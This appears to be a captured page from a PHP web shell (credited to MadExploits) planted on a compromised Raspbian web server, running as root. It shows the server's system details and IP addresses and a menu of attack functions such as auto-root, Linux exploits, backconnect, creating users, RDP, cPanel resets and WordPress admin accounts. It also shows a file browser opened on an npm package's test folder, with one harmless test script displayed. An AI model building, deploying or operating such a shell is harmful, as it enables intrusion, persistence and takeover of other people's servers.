Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
npm /
node_modules /
read-installed /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
fixtures
[ DIR ]
drwxr-xr-x
basic.js
1.3
KB
-rw-r--r--
cyclic-extraneous-peer-deps.js
1.9
KB
-rw-r--r--
depth-0.js
1.01
KB
-rw-r--r--
depth-1.js
826
B
-rw-r--r--
dev.js
863
B
-rw-r--r--
empty.js
527
B
-rw-r--r--
extraneous-dev.js
600
B
-rw-r--r--
extraneous.js
752
B
-rw-r--r--
grandparent-peer-dev.js
585
B
-rw-r--r--
grandparent-peer.js
761
B
-rw-r--r--
issue-40.js
441
B
-rw-r--r--
linked-dep-dev-deps-extraneous...
1.29
KB
-rw-r--r--
noargs.js
818
B
-rw-r--r--
peer-dep-at-latest.js
425
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : depth-1.js
var readInstalled = require("../read-installed.js") var test = require("tap").test var json = require("../package.json") var path = require("path") var known = [].concat(Object.keys(json.dependencies) , Object.keys(json.optionalDependencies) , Object.keys(json.devDependencies)).sort() test("make sure that it works with depth=1", function (t) { readInstalled(path.join(__dirname, "../"), { depth: 1 }, function (er, map) { t.notOk(er, "er should be bull") t.ok(map, "map should be data") if (er) return console.error(er.stack || er.message) var subdeps = Object.keys(map.dependencies).reduce(function(acc, dep) { acc += Object.keys(map.dependencies[dep].dependencies).length; return acc; }, 0); t.notEqual(subdeps, 0, "there should some sub dependencies") t.end() }) })
Close